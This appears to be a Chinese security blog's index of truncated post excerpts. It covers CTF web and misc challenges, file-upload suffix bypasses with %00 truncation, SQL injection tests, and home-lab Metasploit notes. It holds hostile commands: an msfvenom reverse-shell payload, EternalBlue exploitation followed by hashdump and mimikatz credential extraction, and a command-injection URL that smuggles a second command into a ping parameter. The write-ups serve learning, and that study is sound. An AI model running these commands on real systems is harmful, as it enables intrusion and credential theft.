本来出道web题投稿到安恒的,安恒要写Dockerfile,怕是在为难我胖虎!!
好了,速学了一下docker,请教了docker忘的差不多的云计算选手
我的天,到最后还是一大堆bug
也就是搭建一个centos的环境,要有apache和php就行
没找到用centos镜像再去装apache和php的,找到了也是一堆bug,就拉了一个现成的
FROM naqoda/centos-apache-phpCOPY html/index.php /var/www/app/public_html/RUN echo “ServerName localhost:80” >...
1234567891011121314151617181920212223242526272829303132333435363738394041424344<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"><title></title></head><body><form method="POST" encty...
这是油管上的代码,我在思考这种判别后缀的方式有没有漏洞,第一时间想到的是%00截断,但是实验后发现比如1.php%00.jpg,%00后面的已经过滤了,然后.号分隔取最后,无法绕过,我在freebuf上也看到这个白名单检测的问题(http://www.freebuf.com/vuls/128846.html)在分隔成数组之前已经是php后缀了当然往跟深处讲,如果网站有文件包含漏洞的话,将一句话木马变成png上传成功后,再利用文件包含,也是可行的方法!dvwa的后缀检测:更多白名单的后缀检测:(https://www.jb51.net/article/81320.htm)
sql注入一种常见的网络攻击手段,以前没学php的时候只会一点mysql的语言,万能密码啥的绕过,防御只了解过pdo,手工注入更是弱爆,直接sqlmap注入,现在学了php后,有了一个全新的认识
油管大佬介绍了利用mysqli_real_escape_string这个函数来防御SQL注入:(https://youtu.be/nTgFPcYRkys)
函数介绍:(http://www.w3school.com.cn/php/func_mysql_real_escape_string.asp)
于是我专门实验了万能密码的绕过
先在我的数据库创建一张表:
撸上我的代码:
看...
misc1F5算法:https://github.com/matthewgao/F5-steganography
java Extract Misc.jpg
zip伪加密1->0
mis2注释得到摩斯密码解密(为压缩包密码)
lsb隐写:https://github.com/livz/cloacked-pixel
python lsb.py extract (python2环境)
web3:web3原理:http://www.freebuf.com/articles/web/35353.html
swf zws头部解析:https://blog.csdn.net/Hundred...
ctf里某群友发的题:http://45.124.115.155:8003/a74a15c5fb626077/**
ls cat 啥的都被过滤了(http://45.124.115.155:8003/a74a15c5fb626077/ping.php?ip=127.0.0.1%0Amore%20ping.php):
PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.086 ms
--- 127.0.0.1 ping statistics -...
win7靶机:192.168.1.38
kali:192.168.1.35
上一篇讲到通过ms17_010获取了shell,如果对方没有这个漏洞可以利用呢?换一种社会工程学的思路:
msfvenom -p windows/meterpreter/resverse_tcp lhost=192.168.1.35 lport=4444 -f exe -o /hack.exe 生成木马
将exe文件发送给靶机
use exploit/multi/handle
set payload windows/meterpreter/resverse_tcp
set lhost 192.168.1.3...
win7靶机:192.168.1.38(所有实验均在虚拟机上完成,切勿用于非法用途)
kali:192.168.1.35
use exploit/windows/smb/ms17_010_eternalblueset payload windows/meterpreter/reverse_tcp
查看下options
返回shell后:hashdump
load mimikatz
运行命令msv,导出hash
msv
然后执行kerberos即可获得目标机账号密码
kerberos
使用端口转发工具,将端口转发到访问者本地机器的某个端口,从而进行连接运行命令
portfwd...
123456789101112131415161718192021222324<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"><title>Document</title></head><body><img src="hack.jpg" id="image"><scri...
原理(来源为网上):
1.为什么在文件后面加上<.jpg>和在数据包后面加上修改后的文件名? PHP在对文件后缀进行判断时是对最后一个 <.xxx> 来判断的。这样我们修改过后的文件 名,PHP会将其判断为.jpg文件这样我们可以绕过对文件名的检测。2.为什么我们对文件名修改过后还需要添加%00截断? 尽管我们知道我们上传的是一个PHP文件,但是如果不进行%00截断,我们上传的文件在服务 器上是以格式保存也就是说这是一个图片文件,PHP是不会解析这个文件。 当我们进行%00截断后,服务器就会将%00后的<.jpg>进行截断,这是我们...